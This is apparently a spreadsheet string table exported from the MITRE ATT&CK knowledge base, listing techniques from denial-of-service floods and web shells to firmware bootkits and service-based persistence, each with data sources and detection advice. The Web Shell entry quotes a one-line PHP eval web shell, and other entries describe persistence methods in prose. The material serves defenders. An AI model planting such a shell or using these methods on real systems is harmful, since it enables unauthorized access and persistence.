    <t>Detection of a network flood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network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)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</si>
  <si>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T1498.002</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>macOS,Windows,Linux,AWS,Office 365,Azure AD,GCP,Azure,SaaS</t>
  </si>
  <si>
    <t>Detection of reflection amplification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reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service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 may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)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</si>
  <si>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Endpoint Denial of Service</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1499.001</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Network device logs,Netflow/Enclave netflow,Network intrusion detection system,SSL/TLS inspection</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.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</si>
  <si>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T1499.002</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target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</si>
  <si>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T1499.003</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>Network device logs,Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>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DoS condition.</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Process monitoring,File monitoring,Application logs</t>
  </si>
  <si>
    <t xml:space="preserve">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
Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </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</si>
  <si>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t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>Application logs</t>
  </si>
  <si>
    <t>On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.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</si>
  <si>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</si>
  <si>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T1505.002</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>Application logs,File monitoring</t>
  </si>
  <si>
    <t>Linux,Windows</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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T1505.003</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Process monitoring,Netflow/Enclave netflow,File monitoring,Authentication logs</t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;&amp;lt;?php @eval($_POST['password']);&amp;gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe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 (Citation: US-CERT Alert TA15-314A Web Shells) </t>
  </si>
  <si>
    <t xml:space="preserve">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(ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) </t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,Process command-line parameters,Process monitoring,File monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1518.001</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,File monitoring,Process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</si>
  <si>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In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Implant Container Image</t>
  </si>
  <si>
    <t>File monitoring,Asset management</t>
  </si>
  <si>
    <t>GCP,Azure,AWS</t>
  </si>
  <si>
    <t>Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may implant cloud container images with malicious code to establish persistence. Amazon Web Service (AWS) Amazon Machine Images (AMI), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored.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attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) Adversaries may also implant Docker images that may be inadvertently used in cloud deployments, which has been reported in some instances of cryptomining botnets.(Citation: ATT Cybersecurity Cryptocurrency Attacks on Cloud) </t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Azure AD,Office 365,SaaS</t>
  </si>
  <si>
    <t>Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.</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</si>
  <si>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Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>Azure activity logs,OAuth audit logs</t>
  </si>
  <si>
    <t>SaaS,Office 365,Azure AD</t>
  </si>
  <si>
    <t>Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and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</si>
  <si>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Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.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link through [Spearphishing Link](https://attack.mitre.org/techniques/T1192) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1527).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.</t>
  </si>
  <si>
    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.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</si>
  <si>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Data from Cloud Storage Object</t>
  </si>
  <si>
    <t>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure</t>
  </si>
  <si>
    <t>Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.</t>
  </si>
  <si>
    <t>Adversaries may access data objects from improperly secured cloud storage.
Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
* Event ID 4723 - An attempt was made to change an account's password
* Event ID 4724 - An attempt was made to reset an account's password
* Event ID 4726 - A user account was deleted
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</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</si>
  <si>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reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>SSL/TLS inspection,DNS records,Anti-virus,Web proxy,File monitoring,Mail server,Office 365 trace logs</t>
  </si>
  <si>
    <t>Windows,macOS,Linux,Office 365,SaaS</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)</t>
  </si>
  <si>
    <t>Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack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attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS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</si>
  <si>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For example, AWS GuardDuty is not supported in every region.(Citation: AWS Region Service Table)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</si>
  <si>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Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>Azure,AWS,GCP</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. </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</si>
  <si>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</si>
  <si>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Cloud Service Dashboard</t>
  </si>
  <si>
    <t>Office 365 audit logs,Azure activity logs,Stackdriver logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Azure AD,Office 365</t>
  </si>
  <si>
    <t>Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</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</si>
  <si>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</si>
  <si>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Steal Web Session Cookie</t>
  </si>
  <si>
    <t>File monitoring,API monitoring</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,SaaS</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>An adversary may steal web application or service session cookies and use them to gain access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 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>VBR,MBR,Component firmware,Process monitoring,Disk forensics,EFI,BIOS,API monitoring</t>
  </si>
  <si>
    <t>Linux,Windows,Network</t>
  </si>
  <si>
    <t>Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)</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</si>
  <si>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t>
  </si>
  <si>
    <t>Anti-virus,Host intrusion prevention systems,File monitoring</t>
  </si>
  <si>
    <t>T1542.001</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>EFI,BIOS,API monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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persistence,defense-evasion</t>
  </si>
  <si>
    <t>Host intrusion prevention systems,Anti-virus,File monitoring</t>
  </si>
  <si>
    <t>T1542.002</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Component firmware,Process monitoring,Disk forensics,API monitoring</t>
  </si>
  <si>
    <t>Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1542.003</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>VBR,MBR,API monitoring</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1542.004</t>
  </si>
  <si>
    <t>ROMMONkit</t>
  </si>
  <si>
    <t>File monitoring,Netflow/Enclave netflow,Network protocol analysis,Packet capture</t>
  </si>
  <si>
    <t>There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>Network device run-time memory,Network device command history,Network device configuration,File monitoring,Network device logs</t>
  </si>
  <si>
    <t>Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t>Windows event logs,Windows Registry,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes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Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
Monitor for changes to files associated with system-level processes.</t>
  </si>
  <si>
    <t xml:space="preserve">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 (Citation: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 (Citation: OSX Malware Detection).  </t>
  </si>
  <si>
    <t>T1543.001</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. 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 (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).
Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories  (Citation: Sofacy Komplex Trojan)  (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>Systemd service unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;/home/&lt;username&gt;/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: &lt;code&gt;systemctl list-units -–type=service –all&lt;/code&gt;. Analyze the contents of &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as &lt;code&gt;/usr/sbin/service&lt;/code&gt; may reveal malicious systemd service execution.</t>
  </si>
  <si>
    <t>Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories and have the file extension &lt;code&gt;.service&lt;/code&gt;. Each service unit file may contain numerous directives that can execute system commands:
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. 
* ExecReload directive covers when a service restarts. 
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)
While adversaries typically require root privileges to create/modify service unit files in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories, low privilege users can create/modify service unit files in directories such as &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>API monitoring,Windows event logs,Process command-line parameters,Process monitoring,File monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  
Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  
Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.
Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t xml:space="preserve">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Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). 
Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.
An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. 
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). </t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. 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Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories  (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: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 </t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t>API monitoring,Windows event logs,System calls,Binary file metadata,Process use of network,WMI Objects,File monitoring,Process command-line parameters,Process monitoring,Loaded DLLs,DLL monitoring,Windows Registry</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. 
These mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. 
Monitor for processes, API/System calls, and other common ways of manipulating these event repositories. 
Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process.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</si>
  <si>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 xml:space="preserve">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t>
  </si>
  <si>
    <t>privilege-escalation,persistence</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Windows Registry</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</si>
  <si>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</si>
  <si>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(Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: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 (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>File monitoring,Windows Registry,Process command-line parameters,Process monitoring</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</si>
  <si>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</si>
  <si>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 (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>T1546.003</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,WMI Objects</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the &lt;code&gt; Register-WmiEvent&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).</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</si>
  <si>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loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</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</si>
  <si>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</si>
  <si>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Adversaries may establish persistence by executing malicious content triggered by a user’s shell. &lt;code&gt;~/.bash_profile&lt;/code&gt; and &lt;code&gt;~/.bashrc&lt;/code&gt; are shell scripts that contain shell commands. These files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the &lt;code&gt;~/.bash_profile&lt;/code&gt; script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the &lt;code&gt;~/.bashrc&lt;/code&gt; script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment.
The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling &lt;code&gt;~/.bash_profile&lt;/code&gt; each time instead of &lt;code&gt;~/.bashrc&lt;/code&gt;.
Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware)</t>
  </si>
  <si>
    <t>T1546.005</t>
  </si>
  <si>
    <t>Trap</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1546.006</t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Binary file metadata</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</si>
  <si>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</si>
  <si>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 (Citation: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 (Citation: Malware Persistence on OS X)</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Windows Registry,DLL monitoring</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</si>
  <si>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 (Citation: Demaske Netsh Persistence)</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</si>
  <si>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 (Citation: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 (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>T1546.008</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,File monitoring,Windows Registry</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1546.009</t>
  </si>
  <si>
    <t>AppCert DLLs</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</si>
  <si>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Endgame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</si>
  <si>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 xml:space="preserve">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Endgame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t>
  </si>
  <si>
    <t>T1546.010</t>
  </si>
  <si>
    <t>AppInit DLLs</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</si>
  <si>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&lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Endgame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</si>
  <si>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Endgame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t>
  </si>
  <si>
    <t>T1546.011</t>
  </si>
  <si>
    <t>Application Shimming</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</si>
  <si>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</si>
  <si>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Endgame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t>
  </si>
  <si>
    <t>T1546.012</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
